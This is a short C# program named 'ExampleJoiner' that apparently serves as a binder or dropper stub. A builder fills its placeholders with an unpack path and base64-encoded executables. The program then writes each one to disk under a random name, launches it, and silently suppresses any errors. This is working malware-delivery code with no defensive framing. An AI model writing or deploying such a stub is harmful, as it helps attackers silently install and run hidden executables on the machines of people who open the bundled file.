using System;
using System.Diagnostics;
using System.IO;

namespace ExampleJoiner
{
    class Program
    {
        static int getRandNumber(int num)
        {
            int randNum = new Random().Next(0, num);
            return randNum;
        }

        static void Main()
        {
        string UnpackPath = @"$$$";
        string[] file = @"###".Split(';');
            for(int i = 0; i < file.Length; i++)
            {
                try
                {
                    string name = UnpackPath + getRandNumber(3000) + ".exe";
                    File.WriteAllBytes(name, Convert.FromBase64String(file[i]));
                    Process.Start(name);
                }
                catch
                {

                }
            }
        }
    }
}
